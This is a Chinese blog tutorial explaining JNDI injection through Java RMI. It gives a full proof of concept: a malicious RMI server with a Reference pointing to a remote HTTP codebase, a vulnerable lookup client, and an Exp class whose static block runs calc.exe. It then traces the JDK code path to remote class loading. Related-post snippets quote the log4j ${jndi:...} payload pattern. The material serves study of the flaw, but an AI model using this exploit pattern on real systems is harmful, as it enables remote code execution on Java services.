5-java安全基础——RMI和JNDI实现漏洞利用

最新推荐文章于 2023-01-18 14:59:46 发布
最新推荐文章于 2023-01-18 14:59:46 发布
阅读量3.5k 收藏 17
点赞数 1
分类专栏: 网络安全 文章标签: java 安全 rmi jndi
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35733751/article/details/118720502
版权

实验环境:

jdk7u80

JNDI(Java Naming and Directory Interface,Java命名和目录接口)是一组在Java应用中访问命名和目录服务的接口,jndi可以实现给当前服务器的所有资源定义一个唯一的访问标识(例如数据库,网页,文件,连接池等等),方便开发者通过指定的标识来访问对象(目标资源文件,数据库等等)。

关于什么是标识符?可参考RMI注册表(4-java安全基础——RMI远程调用),例如在RMI中通过rmi://10.100.0.1:10086/userRmiServices来映射RMI注册表中的userRmiServices远程对象引用。

jndi提供了一些API接口来实现查找和访问各种命名和目录服务,主要关注以下两个类:

javax.naming.InitialContext;
javax.naming.Reference;

InitialContext类主要是用于构建jndi上下文环境的一些初始化工作,Reference类表示jndi中命名或目录服务中对象的引用。

initialContext类有一个lookup方法可以根据传入的标识获取命名服务所指向的对象引用,如果lookup方法的参数(jndi_uri可控的话,那么就可能会触发jndi注入。

public class JndiTest {
    public static void main(String[] args) throws NamingException {
        //指定RMI服务资源的标识
        String jndi_uri = "rmi://127.0.0.1:10086/test";
        //构建jndi上下文环境
        InitialContext initialContext = new InitialContext();
        //查找标识关联的RMI服务
        initialContext.lookup(jndi_uri);
    }
}

什么是jndi注入?如果RMI客户端中的 jndi_uri 变量可控,攻击者就可以可能通过篡改RMI客户端中 jndi_uri的值,把RMI客户端导向到其他地方并加载一个恶意的类来达到某种目的,这样客户端就有可能被攻击。

来看一个简单的jndi注入程序。

服务端充当攻击者:

public class RmiServerTest {
    public static void main(String[] args) throws NamingException, RemoteException, AlreadyBoundException {
        //标识符
        String jndi_uri = "http://127.0.0.1:8081/";
        //注册中心
        Registry registry = LocateRegistry.createRegistry(10086);
        //标识符与与恶意对象关联
        Reference reference = new Reference("Exp", "Exp", jndi_uri);
        ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
        //将名称与恶意对象实体进行绑定注册
        registry.bind("Exp",referenceWrapper);
        System.out.println("RMI服务端已启动......");
    }
}

jndi通过会标识(http://127.0.0.1:8081/)与Exp类对象构造一个reference 对象引用,这就是jndi的命名服务的作用。

客户端充当被攻击者

public class RmiClientTest {
    public static void main(String[] args) throws NamingException {
        //指定RMI服务资源的标识
        String jndi_uri = "rmi://127.0.0.1:10086/Exp";
        //构建jndi上下文环境
        InitialContext initialContext = new InitialContext();
        //查找标识关联的RMI服务
        initialContext.lookup(jndi_uri);
    }
}

攻击代码:

import java.io.*;

public class Exp{
    static {
        try {
            //调用计算器
            Runtime.getRuntime().exec("calc.exe");
        }
        catch (IOException ex) {
            ex.printStackTrace();
        }
    }
}

使用javac命令将Exp.java文件编译成Exp.class文件,并将class文件放到web服务器下,这个web服务器会监听8081端口

先启动服务端,再启动客户端,可以看到客户端处成功调用了本地的计算器。

分析jndi注入+RMI漏洞利用流程:

首先服务端会根据恶意exp类与标识构造一个Reference对象引用,然后将这个恶意的Reference引用绑定到RMI注册中心,当客户端调用lookup方法获取Reference对象引用时,然后会加载Reference引用中指定的类,一般会先从本地寻找Exp类,如果找不到就会从Reference引用中指定的远程地址(http://127.0.0.1:8081/)中下载Exp类然后在本地加载该类,也就是说RMI客户端会再次跟远程地址建立tcp连接把Exp类下载到本地并加载。从监听的端口来看,客户端确实发送了一个http请求把Exp类下载到本地,然后在加载Exp类时就会执行静态代码块中的代码,调用本地的计算器。

当客户端的initialContext对象调用lookup方法时就会触发漏洞,我们来分析initialContext的lookup方法做了什么,如何触发漏洞?

public Object lookup(String name) throws NamingException {
    return getURLOrDefaultInitCtx(name).lookup(name);
}

      在lookup方法内部中,getURLOrDefaultInitCtx方法会根据传入的标识名称返回一个URL上下文后,接着又调用了一个lookup方法。

跟进getURLOrDefaultInitCtx方法,调用了getURLScheme方法获取标识名称中的协议,也就是rmi,如果不为空接着调用了getURLContext方法获取url中rmi协议对象返回。

    protected Context getURLOrDefaultInitCtx(String name)
        throws NamingException {
        if (NamingManager.hasInitialContextFactoryBuilder()) {
            return getDefaultInitCtx();
        }
        String scheme = getURLScheme(name);
        if (scheme != null) {
            Context ctx = NamingManager.getURLContext(scheme, myProps);
            if (ctx != null) {
                return ctx;
            }
        }
        return getDefaultInitCtx();
    }

接着getURLOrDefaultInitCtx方法返回的url中的rmi协议对象会调用一个lookup方法

public Object lookup(String var1) throws NamingException {
        //获取ResolveResult对象
        ResolveResult var2 = this.getRootURLContext(var1, this.myEnv);
        //获取RMI注册中心
        Context var3 = (Context)var2.getResolvedObj();

        Object var4;
        try {
             //查找RMI远程调用对象
            var4 = var3.lookup(var2.getRemainingName());
        } finally {
            var3.close();
        }

        return var4;
    }

       getRootURLContext方法会根据rmi协议获取一个ResolveResult对象,这个对象包含两个内容:一个是RMI注册中心对象,另一个是RMI远程调用对象的名称,也就是exp。然后getResolvedObj是从ResolveResult对象中获取RMI注册中心对象,getRemainingName方法是从ResolveResult对象中获取RMI远程调用对象的名称,然后RMI注册中心调用了lookup方法根据传入的名称查找RMI远程调用对象名。

实际上是调用了RMI注册中心(RegistryContext)的lookup方法

    public Object lookup(Name var1) throws NamingException {
        if (var1.isEmpty()) {
             //如果名称为空,返回新的RMI注册中心
            return new RegistryContext(this);
        } else {
            Remote var2;
            try {
                //调用lookup方法
                var2 = this.registry.lookup(var1.get(0));
            } catch (NotBoundException var4) {
                throw new NameNotFoundException(var1.get(0));
            } catch (RemoteException var5) {
                throw (NamingException)wrapRemoteException(var5).fillInStackTrace();
            }

            return this.decodeObject(var2, var1.getPrefix(1));
        }
    }

       实际上到这一步才真正的调用RMI注册中心的lookup方法,并在调用之前先解析RMI远程调用对象的名称,RMI注册中心会根据传入的RMI远程调用对象的名称查找对应的RMI远程调用对象的引用,也就是把ReferenceWrapper_Stub对象返回,此时var2就是ReferenceWrapper_Stub对象。

接着调用了decodeObject方法

	private Object decodeObject(Remote var1, Name var2) throws NamingException {
        try {
            //获取reference对象
            Object var3 = var1 instanceof RemoteReference ? ((RemoteReference)var1).getReference() : var1;
            return NamingManager.getObjectInstance(var3, var2, this, this.environment);
        } catch (NamingException var5) {
            throw var5;
        } catch (RemoteException var6) {
            throw (NamingException)wrapRemoteException(var6).fillInStackTrace();
        } catch (Exception var7) {
            NamingException var4 = new NamingException();
            var4.setRootCause(var7);
            throw var4;
        }
    }

        由于ReferenceWrapper_Stub对象实现了RemoteReference接口,这个接口有一个getReference方法,ReferenceWrapper_Stub对象也可以调用getReference方法获取reference对象,该对象主要有三部分:className,classFactory,classFactoryLocation。这部分也就是服务端中new Reference("Exp", "Exp", jndi_uri)中指定的要加载的类名,类工厂,远程地址,接着调用了getObjectInstance方法并将reference对象传给了参数refInfo。

getObjectInstance方法具体实现如下:

public static Object getObjectInstance(Object refInfo, Name name, Context nameCtx, Hashtable<?,?> environment) throws Exception {
        ObjectFactory factory;

        // Use builder if installed
        ObjectFactoryBuilder builder = getObjectFactoryBuilder();
        if (builder != null) {
            // builder must return non-null factory
            factory = builder.createObjectFactory(refInfo, environment);
            return factory.getObjectInstance(refInfo, name, nameCtx,
                environment);
        }

        // Use reference if possible
        Reference ref = null;
        //是否为reference对象
        if (refInfo instanceof Reference) {
         //将reference对象赋值给ref
            ref = (Reference) refInfo;
        } else if (refInfo instanceof Referenceable) {
            ref = ((Referenceable)(refInfo)).getReference();
        }

        Object answer;
        //判断ref是否为空
        if (ref != null) {
             //获取reference对象中的工厂类
            String f = ref.getFactoryClassName();
            if (f != null) {
                // if reference identifies a factory, use exclusively
                 //工厂类不为空,获取对象引用
                factory = getObjectFactoryFromReference(ref, f);
                if (factory != null) {
                    return factory.getObjectInstance(ref, name, nameCtx,
                                                     environment);
                }
                // No factory found, so return original refInfo.
                // Will reach this point if factory class is not in
                // class path and reference does not contain a URL for it
                return refInfo;

            } else {
                // if reference has no factory, check for addresses
                // containing URLs

                answer = processURLAddrs(ref, name, nameCtx, environment);
                if (answer != null) {
                    return answer;
                }
            }
        }

        // try using any specified factories
        answer =
            createObjectFromFactories(refInfo, name, nameCtx, environment);
        return (answer != null) ? answer : refInfo;
}

      getObjectInstance方法内部调用了将reference对象赋值给ref,然后调用了getFactoryClassName方法获取reference引用的对象的工厂类名,也就是获取Exp类。如果工厂类名不为空则继续调用getObjectFactoryFromReference方法,

继续跟进getObjectFactoryFromReference方法

 	static ObjectFactory getObjectFactoryFromReference(Reference ref, String factoryName)throws IllegalAccessException,InstantiationException,MalformedURLException {
        Class clas = null;

        // Try to use current class loader
        try {
             //加载工厂类Exp
             clas = helper.loadClass(factoryName);
        } catch (ClassNotFoundException e) {
            // ignore and continue
            // e.printStackTrace();
        }
        // All other exceptions are passed up.

        // Not in class path; try to use codebase
        String codebase;
        //如果加载失败,则获取远程请求地址
        if (clas == null &&
                (codebase = ref.getFactoryClassLocation()) != null) {
            try {
                //远程加载工厂类
                clas = helper.loadClass(factoryName, codebase);
            } catch (ClassNotFoundException e) {
            }
        }

        return (clas != null) ? (ObjectFactory) clas.newInstance() : null;
    }

getObjectFactoryFromReference方法首先会在本地加载工厂类Exp,如果loadClass方法在本地没有找到该类就会调用getFactoryClassLocation方法获取远程url地址,如果不为空则根据远程url地址使用类加载器URLClassLoader来加载Exp类,并且在web服务器中确实有一个Exp类的http请求记录。

这里用到了反射的动态类加载机制,当Exp被加载到内存时会执行静态代码块里的代码,从而造成漏洞利用。

参考资料:

Java安全之JNDI注入

song->_->
关注
  • 1
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
javaRMI反序列化漏洞验证工具
08-21
检测javaRMI反序列化漏洞
java安全入门(四)——JNDI入门指北
weixin_45808483的博客
02-14 4230
前言 log4j2 宛如过年一般,趁此机会对没理清的 JNDI 协议仔细再捋一捋 log4j的payload很好记:${jndi:ldap/rmi://xxxxxx/exp} 那么,我们就需要研究一下是怎么来的。 首先来看rpc RPC RPC即 Remote Procedure Call(远程过程调用),==是一种技术思想而并非一种规范的协议==,是一种通过网络从远程计算机请求服务的过程。 常见 RPC 技术和框架有: 应用级的服务框架:阿里的 Dubbo/Dubbox、Google
Java 安全-JNDI注入学习
Townmacro的博客
05-23 1195
背景知识 JNDI Service Provider JNDIJNDI Service Provider 的关系类似于 Windows 中 SSPI 与 SSP 的关系。前者是统一抽象出来的接口,而后者是对接口的具体实现。如默认的 JNDI Service Provider 有 RMI/LDAP 等等。 ObjectFactory 每一个 Service Provider 可能配有多个 Object Factory。Object Factory 用于将 Naming Service(如 RMI/L
Java rmi 漏洞利用笔记
边城浪子的博客
09-18 1267
Java RMI 指的是远程方法调用 (Remote Method Invocation)。它是一种机制,能够让在某个 Java 虚拟机上的对象调用另一个 Java 虚拟机中的对象上的方法。 实验环境: 攻击机:kali linux ip:192.168.172.134 目标机:Metasploittable2 ip:192.168.172.129 攻击过程: step1:nmap扫描漏...
Java rmi漏洞利用及原理记录
weixin_30564901的博客
08-15 1232
CVE-2011-3556 该模块利用了RMI的默认配置。注册表和RMI激活服务,允许加载类来自任何远程(HTTP)URL。当它在RMI中调用一个方法时分布式垃圾收集器,可通过每个RMI使用endpoint,它可以用于rmiregist和rmid,以及对大多 漏洞利用: 漏洞常用端口1099 msf5 > use exploit/multi/misc/java_rmi...
java_rmi漏洞利用工具
05-31
本项目使用socket直接发送数据包来攻击rmi,通过反序列化攻击rmi,双击直接运行,对1099端口的rmi服务直接进行漏洞检测。
Java RMI漏洞利用(1099/1090对外开放-rce)
yggcwhat
01-18 1753
Java RMI漏洞利用(1099/1090对外开放-rce)
Library-Management-System---Java-RMI:使用JAVA RMI技术开发的图书馆信息系统
05-13
该系统是使用JAVA RMI技术开发的,具有Socket编程和用于大学项目的多线程。
Java-RMI:JavaRMI 实现,在 Java
07-05
Java-RMI Java 中的 RMI 实现,作为卡内基梅隆大学 15-440 分布式系统课程的一部分创建
rmi-client-server:RMI 客户端和服务器的简单 Java 实现
05-31
rmi-客户端-服务器 RMI 客户端和服务器的简单 Java 实现 服务器 shell 脚本会将服务器库编译为 jar,然后运行服务器。 像这样运行它: ./server.sh 现在启动客户端: ./client.sh 客户端当前实现为 Groovy 脚本...
JNDI-Injection-Exploit:JNDI注入测试工具(生成JNDI链接的工具可以启动多个服务器来利用JNDI Injection漏洞,例如Jackson,Fastjson等)
05-07
JNDI注入漏洞 描述 JNDI-Injection-Exploit是用于生成可用的JNDI链接并通过启动RMI服务器,LDAP服务器和HTTP服务器来提供后台服务的工具。 RMI服务器和LDAP服务器基于并进行了进一步修改以与HTTP服务器链接。 使用此工具可以获取JNDI链接,可以将这些链接插入POC以测试漏洞。 例如,这是一个Fastjson vul-poc: { " @type " : " com.sun.rowset.JdbcRowSetImpl " , " dataSourceName " : " rmi://127.0.0.1:1099/Object " , " autoCommit " : true } 我们可以用JNDI-Injection-Exploit生成的链接替换“ rmi://127.0.0.1:1099 / Object”,以测试漏洞。 免责声明 所有信
rmi-jndi-ldap-jrmp-jmx-jms:rmijndi,ldap,jrmp,jmx,jms一些演示测试
03-08
rmi-jndi-ldap-jrmp-jmx-jms rmijndi,ldap,jrmp,jmx,jms一些演示测试
JNDI漏洞利用探索
m0_67105288的博客
02-19 1210
最近学习了师傅寻找的一些JNDI漏洞的利用链受益匪浅,自己也尝试关于JNDI漏洞利用做一些挖掘,目前JNDI在利用过程我想到了两个问题。 测试每一个JNDI Bypass 利用链都需要手动更改URL很不方便,能否我去请求一个地址,让目标将我所有的链跑一遍? JNDI利用过程中可以通过反序列化利用,能否自动化探测反序列化利用链? 自动测试Bypass 利用链 为了让这种方式更加通用,我们首先考虑的是JDK原生的实现ObjectFactory的类,那么我注意到了下面几个类。 com.sun.jndi.r
端口渗透篇:Java RMI 远程代码执行漏洞
weixin_50464560的博客
11-26 1581
持续更新:整理下渗透测试工作中发现过的漏洞(包含漏洞描述、漏洞等级、漏洞验证、修复建议),这里不深究漏洞产生的各种后利用或者绕过方式,漏洞验证过程不局限于文章中的方法,能够证明漏洞存在即可。
java rmi反序列化漏洞 简介
whatday的专栏
07-01 744
目录 一、RMI简介 二、RMI示例 三、漏洞复现 四、漏洞分析 1、为什么这里的badAttributeValueExpException对象是通过反射构造,而不是直接声明? 2、为什么不直接将badAttributeValueExpException对象bind到RMI服务? 一、RMI简介 首先看一下RMI在wikipedia上的描述: Java远程方法调用,即Java RMIJava Remote Method Invocation)是Java编程语言里,一种用于实现远程.
Apache Log4j2 lookup JNDI 注入漏洞复现及利用
Tauil的博客
07-21 1116
这时候有过有过js经验的朋友都会知道嗷,编写网站的时候一般都会使用到JNDI这个接口进行目录服务查询,而JNDI中有LDAP的类,他可以用来执行我们的恶意语句,为了方便恶意语句的回显,我们到。查看网络,重新载入一下,看看每个数据包,诶这个时候就会发现有一个数据包存在参数上传,并且URL是在另一个地址。,为什么不用那个,因为啊那个是上传系统参数的数据包,有很大的区别,感兴趣可以自己去搜一下,因为本人java也不是很精通,所以就不多嘴了。并访问,这时我们的攻击机终端就会收到新的消息,这就代表命令。.......
9-Web安全——SQL注入WAF绕过之select及union过滤
网络安全
06-03 9634
1. select及union过滤绕过 真实的注入环境中一般无法通过网站的源代码进行安全审计的,那么在注入过程中我们就需要使用常见的SQL注入绕过技巧来帮助我们进行绕过WAF。 首先需要判断网页的注入类型,输入参数?id=1%0Aand%0A1=2,测试URL为: http://www.sqli.com/Less-27/?id=1%0Aand%0A1=2 页面返回的结果如下: 当我们输入id=1 and 1=2时,页面还是正常返回,说明这是一个字符型注入。 然...
1-Web安全——初识SQL注入漏洞
网络安全
04-28 8239
1. 什么是SQL注入 SQL注入是web应用程序对用户输入的数据没有严格进行合法校验和过滤,导致前端传入到后端的数据是可以恶意修改的,攻击者通过构造不同的SQL语句来实现对数据库的任意操作,这就是SQL注入漏洞的原理。 2. 为什么会有SQL注入 研发人员在开发过程中代码逻辑不严谨造成的,例如没有对SQL参数进行严格过滤 未启用框架的安全配置,例如PHP的magic_quotes...
1-Web安全——命令执行注入攻击
网络安全
09-06 6930
1. 系统命令执行 通常在程序开发过程中,应用程序需要调用一些外部程序时会用到一些系统命令相关函数。 例如在linux系统中,shell解释器就是用户和系统进行交互的一个接口,对用户的输入进行解析并在系统中执行。而shell脚本语言就是linux系统由各种shell命令组成的程序,具有其他普通编程的很多特点。 2. Web命令执行 常用的ASP,PHP,JSP等web脚本解释语言支持动态执行在运行时生成的代码这种特点,可以帮助开发者根据各种数据和条件动态修改程序代码,这对于开发人员来说是有利的.
java-rmi 漏洞
最新发布
07-14
### 回答1: Java RMI(远程方法调用)是一种用于在分布式系统中进行远程通信的Java API。虽然它提供了方便的远程方法调用功能,但也存在一些安全漏洞。 其中一个漏洞是未经授权的远程方法调用(Unauthorized Remote Method Invocation)。在Java RMI中,远程对象可以通过URL公开,并接受来自任何Java虚拟机的调用。如果没有正确的安全措施,攻击者可以利用这个漏洞,通过发送恶意请求来执行未经授权的远程方法调用。这可能导致敏感数据泄露、服务拒绝、远程代码执行等安全风险。 另一个漏洞是远程代码执行(Remote Code Execution)。由于Java RMI允许将类作为参数传递给远程方法调用,攻击者可以通过构建恶意类来在远程系统中执行任意代码。这可能会导致远程系统被完全控制,从而对系统进行非法操作、运行恶意软件等。 为了防止这些漏洞,应采取以下安全措施: 1.授权策略:通过使用Java RMI安全管理器,对远程调用进行授权验证。只允许受信任的主机或用户执行远程方法调用。 2.数据验证:在接受远程方法调用之前,对传入的数据进行验证和过滤,以防止恶意输入。 3.安全传输层:使用安全通信协议(如SSL/TLS)对Java RMI进行加密,以保护数据在网络传输过程中的安全性。 4.类过滤:限制远程对象所需的类只能从特定的类路径加载,以防止远程代码执行。 总之,Java RMI漏洞存在一定的风险,但通过使用适当的安全措施可以有效地减少这些风险。 ### 回答2: Java RMI (Remote Method Invocation)是Java中用于远程调用方法的技术,它允许在不同主机上的Java虚拟机之间进行通信和交互。然而,Java RMI中存在一些漏洞,可能导致安全问题。下面是一些常见的Java RMI漏洞: 1. 未授权访问:在没有适当访问控制的情况下,攻击者可能能够直接访问Java RMI服务,获取敏感信息或执行恶意操作。 2. 服务猝死:如果不正确地实现Java RMI服务,攻击者可能通过发送恶意请求来导致服务崩溃或拒绝服务,导致系统不可用。 3. 反序列化漏洞:由于Java RMI使用Java序列化来传输对象,因此未进行适当的反序列化验证可能导致反序列化漏洞,攻击者可以利用此漏洞在目标系统上执行任意代码。 4. 中间人攻击:由于Java RMI缺乏加密机制,攻击者可能能够拦截和篡改Java RMI通信,以获取敏感信息或篡改数据。 为了解决这些漏洞,可以采取以下措施: 1. 实施访问控制:确保只有经过授权的用户能够访问Java RMI服务,并且只有必要的方法和数据暴露给客户端。 2. 安全配置:在构建Java RMI服务时,应遵循安全最佳实践,确保已正确配置安全管理器和策略文件,以限制服务的操作和访问范围。 3. 验证和过滤输入:在处理Java RMI请求时,始终进行输入验证和过滤,以防止恶意输入和攻击。 4. 反序列化信任:避免直接反序列化不受信任的数据,可以使用白名单或其他验证机制来限制反序列化操作。 5. 加密通信:考虑使用安全的通信协议(如SSL/TLS)来保护Java RMI通信的机密性和完整性,以防止中间人攻击。 总之,了解Java RMI漏洞并采取适当的防护措施是确保Java RMI应用程序安全的重要步骤。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值